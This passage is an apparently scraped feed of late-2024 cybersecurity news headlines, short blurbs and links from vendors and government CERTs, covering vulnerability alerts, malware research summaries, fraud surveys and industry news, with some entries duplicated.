in the SonicWall SMA100 SSLVPN mod_httprp library loaded by the Apache web server allows remote attackers to cause Stack-based buffer overflow and potentially lead to code execution.CVSS Score: 8.1 CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H CWE-121: Stack-based Buffer Overflow SonicWall SSL VPN SMA1000 series products are not affected by these vulnerabilities. SonicWall strongly advises users of the SMA 100 series products (SMA 200, 210, 400, 410, and 500v) to upgrade to the mentioned fixed release version to address these vulnerabilities. CVE: CVE-2024-38475, CVE-2024-40763, CVE-2024-45318, CVE-2024-45319, CVE-2024-53702, CVE-2024-53703 Last updated: April 29, 2025, 12:51 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0018
Joint guidance on enhanced visibility and hardening for communications infrastructure
2024-12-03T16:11:30Z | 1733242290

https://cyber.gc.ca/en/news-events/joint-guidance-enhanced-visibility-hardening-communications-infrastructure
Bringing SWAG to Enterprise Campus Networking!
2024-12-03T14:02:47Z | 1733234567

As client users, devices, and IoT continue to proliferate, the need for switching management and workload optimization across domains increases. Many sub-optimal and closed approaches have been designed in the past. Arista was founded to build the best software and hardware, equating to the highest performance and density in cloud/data centers, and now evolving to campus switches. In 2020, we introduced the smallest footprint of Arista CCS 750 and 720 series switches as a fitting example of the highest density and lowest footprint.

https://blogs.arista.com/blog/swag
Ad fraud on large online platforms
2024-12-03T13:10:00Z | 1733231400

Fraudsters on social media lure users with fake ads promising easy money from celebrities or insider access to government investment programs. These advertisements lead to harmful websites designed to trick or exploit users.

https://cert.pl/en/posts/2024/12/Ad-fraud-on-large-online-platforms/
The Year in Review 2024: Today?s Insights, Tomorrow?s Outlook
2024-12-03T11:20:00Z | 1733224800

https://www.akamai.com/blog/security-research/2024/dec/2024-december-today-insights-tomorrow-outlook-2025
Achieving cybersecurity compliance in 5 steps
2024-12-03T10:00:00Z | 1733220000

Cybersecurity compliance may feel overwhelming, but a few clear steps can make it manageable and ensure your business stays on the right side of regulatory requirements

https://www.welivesecurity.com/en/business-security/achieving-cybersecurity-compliance-5-steps/
Crawling December: The how and why of Googlebot crawling
2024-12-03T10:00:00Z | 1733220000

You may have heard that Google Search needs to do a bit of work before a web page can show up in Google Search results. One of these steps is called crawling. Crawling for Google Search is done by Googlebot, a program running on Google servers that retrieves a URL and handles things like network errors, redirects, and other small complications that it might encounter as it works its way through the web. But there are a few details that aren't often talked about. Each week this month we're going to explore some of those details as they may have a significant effect on how your sites are crawled.

https://developers.google.com/search/blog/2024/12/crawling-december-resources
Security Alert (A24-12-02): Multiple Vulnerabilities in Android
2024-12-03T04:00:00Z | 1733198400

Google has released Android Security Bulletin December 2024 to fix multiple security vulnerabilities in Android operating system.

https://www.govcert.gov.hk/en/alerts_detail.php
2024 State of Threat Intelligence Infographic
2024-12-03T00:00:00Z | 1733184000

Discover key insights from 550+ cybersecurity experts on threat intelligence trends, spending, and strategies in our 2024 infographic. Learn more.

https://www.recordedfuture.com/blog/2024-state-of-threat-intelligence-infographic
Risk facing UK "widely underestimated", cyber chief to warn in first major speech
2024-12-02T23:39:25Z | 1733182765

Richard Horne will describe the cyber risks facing the nation as “widely underestimated” and call for collective action against an increasingly complex array of threats.

https://www.ncsc.gov.uk/news/risk-facing-uk-widely-underestimated-cyber-chief-to-warn-in-first-major-speech
It’s Baaack… Credit Card Canarytokens are now on your Consoles
2024-12-02T17:29:20Z | 1733160560

TL;DR Our credit card Canarytokens are out of beta and flying to your consoles!  We love these tokens because they provide a novel way to alert on a strong signal of badness. They also perfectly embody our concept of conspicuous deception. Conspicuous deception is our take that simply knowing that a credit card could be a Canarytoken adds risk to the process of stealing, selling, testing, and committing fraud on all cards. Now, fraudsters have to worry that testing or using a stolen card might be an immediate tip off. Read on for step-by-step instructions for creating your first credit card token and suggestions for where to deploy them. For the really curious, we offer a behind the scenes look at how we got from last year’s beta to today’s launch. Creating the new credit card token We are slowly enabling these on Canary.tools consoles, if you are eager to try it, reach out to Thinkst Support  and we’ll ensure we hit your console early. Once enabled, the new token will show up in the regular spot, along with the remaining issuable quota. Read on for step-by-step instructions for creating a credit card token. Once you select the Credit Card […]

https://blog.thinkst.com/2024/12/its-baaack-credit-card-canarytokens-are-now-on-your-consoles.html
Rhadamanthys Stealer Analysis for Detection Opportunities
2024-12-02T15:00:17Z | 1733151617

Written by ARC Labs contributor, Shannon Mong Threat Overview  Binary Defense ARC Labs’ threat researchers recently dissected a Rhadamanthys Stealer infection chain to uncover detection opportunities that defenders can leverage to strengthen organizational security. In this analysis, we provide general detection guidance and actionable queries for detecting Rhadamanthys Stealer.  Recent Campaign Insights  Rhadamanthys Stealer surfaced on underground […] The post Rhadamanthys Stealer Analysis for Detection Opportunities  appeared first on Binary Defense.

https://www.binarydefense.com/resources/blog/rhadamanthys-stealer-analysis-for-detection-opportunities/
Battling the Emotional Toxicity Within Games: How to Digitally Thrive
2024-12-02T14:00:00Z | 1733148000

https://www.akamai.com/blog/security-research/2024/oct/2024-mental-health-and-financial-strain-hidden-costs-of-games
The Shift to the Edge Continues to Accelerate
2024-12-02T13:00:00Z | 1733144400

The IDC MarketScape report evaluated providers in the edge delivery services category. Read why Akamai was chosen as a Leader.

https://www.akamai.com/blog/edge/2024/nov/the-shift-to-the-edge-continues-to-accelerate
S-RM appoints Rich Fogarty as Head of Disputes & Investigations, Americas
2024-12-02T10:26:34Z | 1733135194

S-RM appoints Rich Fogarty as Head of Disputes & Investigations: Newly Created Role Reflects S-RM’s Growth in the U.S.   Fogarty brings decades of experience working in investigative services, notably in the U.S. and Latin America.

https://www.s-rminform.com/news/s-rm-appoints-rich-fogarty
Richard Marko: Rethinking cybersecurity in the age of global challenges | Starmus highlights
2024-12-02T10:00:00Z | 1733133600

ESET's CEO unpacks the complexities of cybersecurity in today’s hyper-connected world and highlights the power of innovation in stopping digital threats in their tracks

https://www.welivesecurity.com/en/we-live-science/richard-marko-rethinking-cybersecurity-age-global-challenges-starmus-highlights/
Businesses Battle First-Party Fraud As Consumers Face Financial Pressures
2024-12-02T09:18:43Z | 1733131123

·       16% say they would open an account with a different email address for a new customer rate or offer·       11% don’t see an issue with putting yourself as a named driver on a vehicle for someone else, even though you don’t drive it·       7% say it’s acceptable to exaggerate or downplay your income in an application·       Gen Z and Millennial consumers are more likely to consider giving false information with 44% of 18–24-year-olds and 38% of 25-34-year-olds indicating so. While the vast majority of consumers stay honest, UK businesses still face a battle against first-party fraud as financial pressures persist – according to new data from global information and insights company TransUnion.Despite sustained cost of living pressures, with data showing that almost half of people (43%) feel their household income is not keeping up with inflationi, 74% of consumers still say they would be unlikely to give false information to get a preferential rate on a financial product. However, 19% of adults admit they would consider providing incorrect details to get better rates – with the rest being unsure.Chad Reimers, General Manager of Fraud & Identity at TransUnion in the UK, continues: “First-party fraud is a perennial issue for organisations and that’s why it is essential to have effective data and technology solutions in place to facilitate trust between consumers and providers. TruValidate from TransUnion delivers an accurate and comprehensive view of each consumer by linking proprietary data, personal data, digital attributes and device identifiers, meaning you can protect your business by identifying anomalies and misrepresentation while still offering a personalised, friction-right experience for customers to help achieve safe, smart top-line growth.”The link between financial insecurity and falsifying informationDemonstrating the link between financial insecurity and potentially falsifying information, Gen Z and Millennial consumers are significantly more likely to be driving this trend than other age groups.ii In order to get a better rate, 44% of 18–24-year-olds indicate that they would consider giving incorrect personal details, while 38% of 25-34-year-olds say the same.The trend also indicates that consumers may lack awareness of alternative, legal ways to get better deals. This can include taking more time to shop around, accessing pre-approved deals for financial products, or crucially, checking your credit score and taking simple steps to improve it.In fact, 86% of people who used a credit monitoring service in the past say that it ended up helping them with their finances in at least one way. This includes identifying action steps to improve credit scores (31%), checking for fraudulent credit applications using their ID (27%), or identifying opportunities to refinance their current loans or obtain a lower rate on a credit card (19%) – all of which can eliminate the need to consider giving false information.What consumers consider acceptable to falsifyIn terms of what types of false information are seen as most acceptable by consumers to give to financial providers, one in six (16%) say they have no problem with opening an account with a different email address to access a preferential rate or offer for new customers.Meanwhile, 11% don’t see an issue with putting yourself as a named driver on a vehicle for someone else, even though you don’t drive it. A similar proportion (9%) think the same about receiving money from a third party into your bank account and forwarding on to someone else in exchange for commission. Just 7% say they think it is acceptable to exaggerate or downplay your income in an application.However, it is important for consumers to remember that even changing a small detail or two can technically count as committing fraud, which comes with big legal and financial risks to the individual but also drives up the costs of doing business to organisations, leading to increased prices of goods and services.Learn more about TransUnion’s TruValidate solutions, visit the website.Notes:i Data from TransUnion’s Consumer Pulse study, which is based on a survey of 1,000 adults in the UK, conducted between 1 and 7 May 2024.ii Generations are defined as follows: Gen Z, born 1995–2005; Millennials, born 1980–1994.

https://newsroom.transunion.co.uk/businesses-battle-first-party-fraud-as-consumers-face-financial-pressures/
Majority Stay Honest – But One in Five Willing to Give False Information for Better Deals
2024-12-02T09:12:34Z | 1733130754

·       16% say they would open an account with a different email address for a new customer rate or offer·       11% don’t see an issue with putting yourself as a named driver on a vehicle for someone else, even though you don’t drive it·       7% say it’s acceptable to exaggerate or downplay your income in an application·       Gen Z and Millennial consumers are more likely to consider giving false information with 44% of 18–24-year-olds and 38% of 25-34-year-olds indicating so. While the vast majority of consumers stay honest, UK businesses still face a battle against first-party fraud as financial pressures persist – according to new data from global information and insights company TransUnion.Despite sustained cost of living pressures, with data showing that almost half of people (43%) feel their household income is not keeping up with inflationi, 74% of consumers still say they would be unlikely to give false information to get a preferential rate on a financial product. However, 19% of adults admit they would consider providing incorrect details to get better rates – with the rest being unsure.James Robinson, Managing Director of Consumer Interactive at TransUnion in the UK, comments: “It is heartening to see that most people stay honest when applying for financial products, despite experiencing continued strain on their finances – and that should be commended. It is also important to remember that not everybody who says they would give false information ends up doing so. But even a relatively small minority of consumers doing so can cause big headaches for financial providers – and risks for the individuals involved.”The link between financial insecurity and falsifying informationDemonstrating the link between financial insecurity and potentially falsifying information, Gen Z and Millennial consumers are significantly more likely to be driving this trend than other age groups.ii In order to get a better rate, 44% of 18–24-year-olds indicate that they would consider giving incorrect personal details, while 38% of 25-34-year-olds say the same.The trend also indicates that consumers may lack awareness of alternative, legal ways to get better deals. This can include taking more time to shop around, accessing pre-approved deals for financial products, or crucially, checking your credit score and taking simple steps to improve it. See below for tips from TransUnion.In fact, 86% of people who used a credit monitoring service in the past say that it ended up helping them with their finances in at least one way. This includes identifying action steps to improve credit scores (31%), checking for fraudulent credit applications using their ID (27%), or identifying opportunities to refinance their current loans or obtain a lower rate on a credit card (19%) – all of which can eliminate the need to consider giving false information.What consumers consider acceptable to falsifyIn terms of what types of false information are seen as most acceptable by consumers to give to financial providers, one in six (16%) say they have no problem with opening an account with a different email address to access a preferential rate or offer for new customers.Meanwhile, 11% don’t see an issue with putting yourself as a named driver on a vehicle for someone else, even though you don’t drive it. A similar proportion (9%) think the same about receiving money from a third party into your bank account and forwarding on to someone else in exchange for commission. Just 7% say they think it is acceptable to exaggerate or downplay your income in an application.However, it is important to remember that even changing a small detail or two can technically count as committing fraud, which comes with big legal and financial risks to the individual but also drives up the costs of doing business to organisations, leading to increased prices of goods and services.Top tips from TransUnion that could help get a better deal on financial products1. Check Your Credit Score RegularlyMonitoring your credit score can help you understand your financial health and identify simple steps to improve it – such as making sure you are on the electoral register and setting up Direct Debits for minimum repayments – all boosting your chances of qualifying for better rates.2. Look for Pre-Approved OffersTake advantage of pre-approved deals from financial providers. These are tailored to your credit profile, saving time and increasing your chances of approval.3. Consider Alternatives Like Credit UnionsCredit Unions often offer competitive rates and flexible terms, providing an ethical and community-focused alternative.4. Refinance or Negotiate Existing DealsUse credit monitoring tools to spot opportunities to refinance loans or secure lower rates on credit cards, saving money without needing to look elsewhere.5. Stay Vigilant Against FraudRegular credit monitoring can alert you to suspicious activity or fraudulent applications, protecting your finances and making sure you aren’t being held back by the actions of others.Notes:i Data from TransUnion’s Consumer Pulse study, which is based on a survey of 1,000 adults in the UK, conducted between 1 and 7 May 2024.ii Generations are defined as follows: Gen Z, born 1995–2005; Millennials, born 1980–1994.

https://newsroom.transunion.co.uk/majority-stay-honest--but-one-in-five-willing-to-give-false-information-for-better-deals/
Defying the Odds: How Cato Networks Disrupted IT Security
2024-12-02T07:37:23Z | 1733125043

On the morning of Oct 13th, SpaceX successfully performed a groundbreaking catch of its Starship booster. It was a monumental moment in space exploration, one that David Heinemeier Hansson, co-founder of Ruby on Rails and Basecamp, recently praised in his blog. As Heinemeier Hansson noted, pulling off such feats requires a rare combination of audacity,... The post Defying the Odds: How Cato Networks Disrupted IT Security  appeared first on Cato Networks.

https://www.catonetworks.com/blog/defying-the-odds-how-cato-disrupted-it-security/
Security Alert (A24-12-01): Multiple Vulnerabilities in Synology DiskStation Manager
2024-12-02T04:00:00Z | 1733112000

Synology has published a security advisory to address multiple vulnerabilities in various versions of DiskStation Manager (DSM).

https://www.govcert.gov.hk/en/alerts_detail.php
Introducing Global View – Unified SOC Visibility for Global Enterprises by Nicole Drake
2024-12-02T00:00:00Z | 1733097600

Global View Strengthens your SOC team by delivering more visibility and better central management for your entire environment

https://www.vectra.ai/blog/introducing-global-view-unified-soc-visibility-for-global-enterprises
Month in security with Tony Anscombe – November 2024 edition
2024-11-29T12:53:00Z | 1732884780

Zero days under attack, a new advisory from 'Five Eyes', thousands of ICS units left exposed, and mandatory MFA for all – it's a wrap on another month filled with impactful cybersecurity news

https://www.welivesecurity.com/en/videos/month-security-tony-anscombe-november-2024-edition/
Suurõppusel pandi proovile riigi valmisolek küberkriisiga toimetulekuks
2024-11-29T09:08:51Z | 1732871331

25.–27. novembrini toimus Riigi Infosüsteemi Ameti (RIA) eestvedamisel suurõppus, kus harjutati riigi IT-majade, muude asutuste ja küberreservi koostööd kriiside lahendamisel.

https://ria.ee/uudised/suuroppusel-pandi-proovile-riigi-valmisolek-kuberkriisiga-toimetulekuks
National Cyber Security Centre's weekly review – 48/2024
2024-11-29T06:58:21Z | 1732863501

This week, we'll be covering, among other things, the latest in M365 phishing and how end-of-year sales and the abundant sending of parcels are getting criminals moving.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centres-weekly-review-482024
National Cyber Security Centre's weekly review – 48/2024
2024-11-29T06:58:21Z | 1732863501

This week, we'll be covering, among other things, the latest in M365 phishing and how end-of-year sales and the abundant sending of parcels are getting criminals moving.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centres-weekly-review-482024
Happy New Year 2025
2024-11-28T12:55:00Z | 1732798500

Thank you to all our customers and friends for your support in 2024! The whole Joe Security family wishes you good health, satisfaction and many pleasant moments in 2025!

https://www.joesecurity.org/blog/8469012530546775595
Riasztás állami szervezetek megszemélyesítésével történő adathalász kísérletekről
2024-11-28T12:14:29Z | 1732796069

Tisztelt Ügyfelünk!   A Nemzetbiztonsági Szakszolgálat Nemzeti Kibervédelmi Intézet (NBSZ NKI) riasztást ad ki állami szervezetek nevével való visszaéléssel elkövetett adathalász üzenetekről. A riasztás megjelenésének idején a Nemzeti Infokommunikációs Szolgáltató Zrt., az Építési és Közlekedési Minisztérium, a Magyar Nemzeti Bank, a Debreceni Egyetem, a Szépművészeti Múzeum nevével történt a visszaélés, de feltételezehető, hogy további intézmények […]

https://nki.gov.hu/figyelmeztetesek/riasztas/riasztas-allami-szervezetek-megszemelyesitesevel-torteno-adathalasz-kiserletekrol/
Scams to look out for this holiday season
2024-11-28T10:00:00Z | 1732788000

‘Tis the season to be wary – be on your guard and don’t let fraud ruin your shopping spree

https://www.welivesecurity.com/en/scams/scams-look-out-for-holiday-season/
Publicado Boletim n.º 3/2024 do Observatório de Cibersegurança
2024-11-28T00:00:00Z | 1732752000

O terceiro Boletim de 2024 foca-se nas Tecnologias de Proteção da Privacidade, destacando a conexão entre os avanços tecnológicos e a importância da proteção dos dados pessoais como medida para mitigar o aumento das ameaças à segurança da informação. Como é habitual, o Boletim partilha notícias e documentos considerados de interesse. Consulte o documento.

https://dyn.cncs.gov.pt/pt/detalhe/art/135903/publicado-boletim-n-32024-do-observatorio-de-ciberseguranca
Zero-Day Attacks on Network Edge Devices: Why NDR Matters by Lucie Cardiet
2024-11-28T00:00:00Z | 1732752000

Learn how zero-day attacks on network edge devices bypass traditional defenses and why NDR is essential for detecting and stopping post-compromise threats.

https://www.vectra.ai/blog/zero-day-attacks-on-network-edge-devices-why-ndr-matters
CyberKnight Expands Africa Coverage and Appoints Regional Sales Director for CEWA
2024-11-27T14:22:49Z | 1732717369

The post CyberKnight Expands Africa Coverage and Appoints Regional Sales Director for CEWA appeared first on CyberKnight.

https://cyberknight.tech/blog/cyberknight-expands-africa-coverage-and-appoints-regional-sales-director-for-cewa/
Large Loss of Money? Choose Your LLM Security Solution Wisely.
2024-11-27T14:00:00Z | 1732716000

https://www.akamai.com/blog/security/2024/nov/2024-november-llm-security-financial-impact
Bootkitty marks a new chapter in the evolution of UEFI threats
2024-11-27T13:16:11Z | 1732713371

ESET researchers make a discovery that signals a shift on the UEFI threat landscape and underscores the need for vigilance against future threats

https://www.welivesecurity.com/en/videos/bootkitty-new-chapter-uefi-threats/
Akamai Leads the Way in API Security: GigaOm Radar for API Security Report
2024-11-27T13:00:00Z | 1732712400

https://www.akamai.com/blog/news/2024/nov/akamai-leads-the-way-in-api-security-gigaom-radar
Bootkitty: Analyzing the first UEFI bootkit for Linux
2024-11-27T07:00:00Z | 1732690800

ESET researchers analyze the first UEFI bootkit designed for Linux systems

https://www.welivesecurity.com/en/eset-research/bootkitty-analyzing-first-uefi-bootkit-linux/
Security Alert (A24-11-22): Multiple Vulnerabilities in Firefox
2024-11-27T04:00:00Z | 1732680000

Mozilla has published the advisories (MFSA2024-63, MFSA2024-64 and MFSA2024-65) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
From Help Desk to CISO: How Communication Shapes Security Success
2024-11-27T00:00:00Z | 1732665600

Discover why over 220 cybersecurity professionals ranked effective communication as the most undervalued skill in the industry. A Storm⚡️Watch podcast poll revealed the critical role "soft skills" play in bridging technical complexity with business needs. Explore real-world stories from industry experts who honed their communication abilities, from simplifying incident reports for executives to adapting technical messages for diverse audiences. Learn how emotional intelligence, adaptability, and clarity drive collaboration and success in cybersecurity. Dive into the full discussion for actionable insights on mastering this essential skill.

https://www.greynoise.io/blog/from-help-desk-to-ciso-how-communication-shapes-security-success
Firefox and Windows zero days chained to deliver the RomCom backdoor
2024-11-26T14:38:16Z | 1732631896

The backdoor can execute commands and lets attackers download additional modules onto the victim’s machine, ESET research finds

https://www.welivesecurity.com/en/videos/zero-click-exploit-abusing-firefox-windows-zero-days/
Cyber Weather October 2024
2024-11-26T14:36:55Z | 1732631815

The number of cyber incident reports received by the NCSC-FI increased in October compared to levels earlier in the autumn. Autumn weather has included occasional rainy clouds and grey spells because of recent email and SMS phishing and scam campaigns targeting Finnish organisations.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_10/2024
Cyber Weather October 2024
2024-11-26T14:36:55Z | 1732631815

The number of cyber incident reports received by the NCSC-FI increased in October compared to levels earlier in the autumn. Autumn weather has included occasional rainy clouds and grey spells because of recent email and SMS phishing and scam campaigns targeting Finnish organisations.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_10/2024
National Cyber Security Centre's weekly review – 47/2024
2024-11-26T13:48:03Z | 1732628883

This week, we cover the newly adopted EU Cyber Resilience Act and how to prepare for different types of disruptions.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centres-weekly-review-472024
National Cyber Security Centre's weekly review – 47/2024
2024-11-26T13:48:03Z | 1732628883

This week, we cover the newly adopted EU Cyber Resilience Act and how to prepare for different types of disruptions.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centres-weekly-review-472024
Keep Your Tech Flame Alive: Akamai Trailblazer Agata Cupriak
2024-11-26T13:00:00Z | 1732626000

https://www.akamai.com/blog/culture/2024/nov/keep-your-tech-flame-alive-agata-cupriak
RomCom exploits Firefox and Windows zero days in the wild
2024-11-26T10:00:00Z | 1732615200

ESET Research details the analysis of a previously unknown vulnerability in Mozilla products exploited in the wild and another previously unknown Microsoft Windows vulnerability, combined in a zero-click exploit

https://www.welivesecurity.com/en/eset-research/romcom-exploits-firefox-and-windows-zero-days-in-the-wild/
"Operation Undercut" Shows Multifaceted Nature of SDA’s Influence Operations
2024-11-26T00:00:00Z | 1732579200

Russia’s “Operation Undercut” uses AI-driven disinformation to sway opinion on Ukraine, aiming to erode Western support. Explore tactics and impacts.

https://www.recordedfuture.com/research/operation-undercut-shows-multifaceted-nature-sdas-influence-operations
Scam Websites Take Advantage of Seasonal Openings and Established Methods to Maximize Impact
2024-11-26T00:00:00Z | 1732579200

Discover how scam websites exploit seasonal opportunities and advanced tactics to target cardholders and banks. Learn how threat actors use lures, monetization strategies, and dark web resources to execute fraud.

https://www.recordedfuture.com/research/scam-websites-take-advantage-of-seasonal-openings
União Europeia define regras de cibergurança para produtos digitais
2024-11-26T00:00:00Z | 1732579200

O Regulamento de Ciber-resiliência publicado a 20 de novembro de 2024 define novas regras em matéria de cibersegurança, de forma a garantir uma maior segurança dos produtos de hardware e software no espaço europeu. Com a entrada em vigor a 21 de dezembro de 2024, estes produtos passam a apresentar a marcação CE para indicar que cumprem as novas normas. Os produtos digitais devem ser disponibilizados no mercado UE, em conformidade com o Regulamento, até 2027. O Regulamento visa proteger os consumidores e as empresas que compram ou utilizam produtos ou software com uma componente digital, quanto ao seu baixo nível de cibersegurança, que resulta em vulnerabilidades generalizadas e uma oferta insuficiente e incoerente de atualizações de segurança para as resolver. A introdução de requisitos obrigatórios de cibersegurança para fabricantes e retalhistas destes produtos, faz com que a proteção seja um fator que perdura ao longo do ciclo de vida do produto. Na lista de produtos com elementos digitais abrangidos incluem-se, entre muitos outros, desde monitores de bebés a relógios inteligentes. O que prevê o regulamento: Regras harmonizadas aquando da introdução no mercado de produtos ou software com um componente digital; Um quadro de requisitos de cibersegurança que regule o planeamento, a conceção, o desenvolvimento e a manutenção destes produtos, com obrigações a cumprir em todas as fases da cadeia de valor; A obrigação de prestar assistência durante todo o ciclo de vida desses produtos. Âmbito de aplicação: O regulamento aplica-se a todos os produtos ligados direta ou indiretamente a outro dispositivo ou rede, com exceção de exclusões específicas, como os serviços já abrangidos pelas regras em vigor, como é o caso dos dispositivos médicos, da aviação e dos automóveis. A priorização da cibersegurança, por fabricantes e retalhistas, permite a clientes e empresas fazerem escolhas mais informadas, confiando nos produtos com a marcação CE. A União Europeia tem vindo a trabalhar no reforço da sua ciber-resiliência, nomeadamente ao nível do funcionamento do mercado interno. Ao estabelecer um regime jurídico uniforme, com requisitos de cibersegurança aplicáveis a produtos que contêm elementos digitais, a EU faz face às suas vulnerabilidades de cibersegurança e contribui para o desenvolvimento de produtos de hardware e software mais seguros.

https://dyn.cncs.gov.pt/pt/detalhe/art/135902/uniao-europeia-define-regras-de-ciberguranca-para-produtos-digitais
Experiencing Verge for the First Time
2024-11-25T07:00:00Z | 1732518000

https://www.akamai.com/blog/sustainability/2024/nov/experiencing-verge-for-the-first-time
Security Alert (A24-11-18): Multiple Vulnerabilities in Microsoft Edge
2024-11-25T04:00:00Z | 1732507200

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-11-19): Multiple Vulnerabilities in PHP
2024-11-25T04:00:00Z | 1732507200

PHP has released security advisories to address multiple vulnerabilities in PHP.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-11-20): Multiple Vulnerabilities in QNAP Products
2024-11-25T04:00:00Z | 1732507200

QNAP has published security advisories to address multiple vulnerabilities in QNAP products.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-11-21): Multiple Vulnerabilities in Drupal
2024-11-25T04:00:00Z | 1732507200

Drupal published security advisories to address multiple vulnerabilities in the Drupal products.

https://www.govcert.gov.hk/en/alerts_detail.php
Dynamic Groups: Taking the Manual Management Out of Group Management on the Vectra AI Platform by Shaun Kane
2024-11-25T00:00:00Z | 1732492800

Discover how to save time with Vectra AI's new Dynamic Groups feature that revolutionizes group management and eliminates manual effort.

https://www.vectra.ai/blog/dynamic-groups-taking-the-manual-management-out-of-group-management-on-the-vectra-ai-platform
The Secret to Reducing Compliance Risk in Financial Services: Visibility
2024-11-22T20:00:00Z | 1732305600

Enhanced visibility is key to managing compliance risk in financial services. Discover how a unified view can improve resilience, protect data, and build trust.

https://www.akamai.com/blog/security/2024/nov/secret-to-reducing-compliance-risk-financial-services-visibility
National Cyber Security Centre's weekly review – 46/2024
2024-11-22T09:43:57Z | 1732268637

This week we cover topics such as ransomware, reporting and the cyber weather.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centres-weekly-review-462024
National Cyber Security Centre's weekly review – 46/2024
2024-11-22T09:43:57Z | 1732268637

This week we cover topics such as ransomware, reporting and the cyber weather.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centres-weekly-review-462024
Building Consistent Efforts: Veterans’ Causes at Recorded Future
2024-11-22T00:00:00Z | 1732233600

Building Consistent Efforts: Veterans’ Causes at Recorded Future

https://www.recordedfuture.com/blog/veterans-day-2024
Transposição da Diretiva NIS 2 (nova data)
2024-11-22T00:00:00Z | 1732233600

Foi submetido a consulta pública, até 31 de dezembro de 2024, a proposta de lei de autorização legislativa para aprovação do novo Regime Jurídico da Cibersegurança, que transpõe a Diretiva (UE) 2022/2555, do Parlamento Europeu e do Conselho, de 14 de dezembro, mais conhecida como “Diretiva NIS 2”, destinada a garantir um elevado nível comum de cibersegurança em toda a União Europeia. A proposta está disponível no portal Consulta.LeX, através do qual podem ser submetidos os contributos e na área de consultas públicas do CNCS. Participe!

https://dyn.cncs.gov.pt/pt/detalhe/art/135901/transposicao-da-diretiva-nis-2-nova-data
Enhanced Document Distribution for a Major Credit Card Processor
2024-11-21T17:25:46Z | 1732209946

For organizations handling massive amounts of sensitive transaction data, speed and security aren’t just priorities—they’re essentials. For financial institutions and credit processors this is a success story to highlight the need for agile data management solutions that provide security, compliance and timeliness in data processing. The post Enhanced Document Distribution for a Major Credit Card Processor appeared first on Data443.

https://data443.com/enhanced-document-distribution-for-a-major-credit-card-processor/
Aryaka Awarded Intelisys 2024 Top Revenue Growth Supplier
2024-11-21T13:01:34Z | 1732194094

Santa Clara, CA, November 21, 2024 – Aryaka®, the leader in Unified SASE as a Service, today announced that it has been recognized by Intelisys, a leading technology services distributor of connectivity and cloud services, as a Top Revenue Growth Supplier. The recognition honors supplier partners for consistently going above and beyond to deliver excellence,... The post Aryaka Awarded Intelisys 2024 Top Revenue Growth Supplier appeared first on Aryaka.

https://www.aryaka.com/press/aryaka-intelisys-2024-top-revenue-growth-supplier/
Unveiling WolfsBane: Gelsemium’s Linux counterpart to Gelsevirine
2024-11-21T10:00:00Z | 1732183200

ESET researchers analyzed previously unknown Linux backdoors that are connected to known Windows malware used by the China-aligned Gelsemium group, and to Project Wood

https://www.welivesecurity.com/en/eset-research/unveiling-wolfsbane-gelsemiums-linux-counterpart-to-gelsevirine/
NIS2 Directive: What Obligations Apply to Mobile Applications and Usage?
2024-11-21T09:30:58Z | 1732181458

Effective from October 2024, the European NIS2 Directive aims to enhance the protection of critical infrastructures against cyberattacks.

https://blog.pradeo.com/nis2-directive-what-obligations-apply-to-mobile-applications-and-usage
Breaking the Mold:  2025 Cyber Threats Outlook
2024-11-21T09:18:06Z | 1732180686

The post Breaking the Mold:  2025 Cyber Threats Outlook  appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-breaking-the-mold-2025-cyber-threats-outlook
Uus infoteenus aitab targalt planeerida rahalist tulevikku
2024-11-21T08:35:07Z | 1732178107

Riigiportaalis eesti.ee on nüüd kõigile kättesaadav uus infoteenus "Minu pension", mis pakub kasutajale põhjalikku ülevaadet pensioni kogumisest ja selle hilisemast kasutamisest. Raha- ja pensionitarkus on sama vajalik kui kirjutamine ja arvutamine. Täna tehtud targad valikud aitavad paremini planeerida isiklikke rahalisi vahendeid ning annavad selguse, kui palju tuleks säästa, koguda või investeerida, et tagada piisav rahaline tugi ka pensionieas.

https://ria.ee/uudised/uus-infoteenus-aitab-targalt-planeerida-rahalist-tulevikku
Riasztás Palo Alto, VMware és Fortinet termékek sérülékenységeiről
2024-11-21T08:06:25Z | 1732176385

A Nemzetbiztonsági Szakszolgálat Nemzeti Kibervédelmi Intézet (NBSZ NKI) riasztást ad ki kritikus kockázati besorolású sérülékenységekről Palo Alto tűzfalak, VMware vCenter szerverszoftverek, valamint a Fortinet VPN klienst érintően, a termékek széles körű elterjedtsége, a sebezhetőségek súlyossága, kihasználhatósága miatt.

https://nki.gov.hu/figyelmeztetesek/riasztas/riasztas-palo-alto-vmware-es-fortinet-termekek-serulekenysegeirol/
Leveling Up Your Security Game: What’s New in Recent BDS Releases
2024-11-21T01:26:04Z | 1732152364

In a world where threats evolve as quickly as the technology we depend on, Hillstone Networks is raising the bar with the BDS new releases. It brings significant enhancements, including an AI-powered Anti-Virus Engine, seamless integration with Apache Kafka, and SSL traffic decryption for better inspection. Here’s a look at what each feature means for […] The post Leveling Up Your Security Game: What’s New in Recent BDS Releases appeared first on Hillstone Networks.

https://www.hillstonenet.com/blog/leveling-up-your-security-game-whats-new-in-recent-bds-releases/
Russia-Aligned TAG-110 Targets Asia and Europe with HATVIBE and CHERRYSPY
2024-11-21T00:00:00Z | 1732147200

TAG-110, a Russia-aligned threat group, targets organizations across Asia and Europe using HATVIBE and CHERRYSPY malware for espionage. Learn how Recorded Future's analysis uncovers the group’s tactics, techniques, and indicators of compromise.

https://www.recordedfuture.com/research/russia-aligned-tag-110-targets-asia-and-europe
GoCast NAT parameter OS command injection vulnerability
